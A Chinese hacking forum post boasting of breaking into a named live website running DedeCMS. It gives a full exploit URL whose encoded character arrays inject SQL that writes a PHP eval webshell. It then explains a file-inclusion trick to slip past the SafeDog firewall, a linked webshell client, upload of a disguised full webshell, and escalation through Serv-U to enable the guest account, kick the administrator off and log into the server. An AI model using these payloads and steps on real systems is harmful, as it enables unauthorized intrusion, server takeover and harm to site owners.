dedecms过新版安全狗拿shell+提权

http://www.mfztdw.net/  目标站
先用dedecms的getshell工具写入一句话木马,访问出现安全狗的提示

\

新版安全狗使用过狗菜刀连接也不行的
[hide]
既然这样,那就用老办法-->文件包含

由于工具里面没有自定义保存文件名,那就自己改下代码了
(这里说说aid,aid用过一次后就不能再使用了,所以aid也要换一个,换成多少就随便了)

http://www.mfztdw.net/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=50&arrs2[]=49&arrs2[]=50&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=113&arrs2[]=101&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=99&arrs2[]=109&arrs2[]=100&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96复制代码

用以上代码生成一个qe.php,内容就是php的一句话木马(不用工具的目的是为了避免重复)

然后用工具生成一个qf.php,内容为php的包含:<?php require_once ("qe.php"); ?>
\

再次访问http://www.mfztdw.net//plus/qf.php 就没有安全狗提示了

可是,一句话木马怎么连接呢?

我这里用的是lanker一句话木马客户端
http://pan.baidu.com/share/link? ... 8&uk=1058480443

(有人说下载了里面没东西,现在放网盘里了)

\

然后利用上传功能上传个图片格式的大马或者利用写入功能写一个图片格式的大马和一个文件包含

这样大马就能访问了

\

看看root ,本来还想root提权呢,结果看到了serv_u,这不是送上门的服务器嘛!
\
serv_u执行命令成功,不错不错,由于有安全狗,添加账户麻烦,那就激活guest喽
\
登录发现连接超过最大允许值,我猜应该是管理员吧
管他呢!用serv_u执行logoff 1 ,看看踢掉没...
\
成功登录服务器
\
fuck!居然还装了360!

貌似这是只笨狗,getshell的时候居然没有拦截!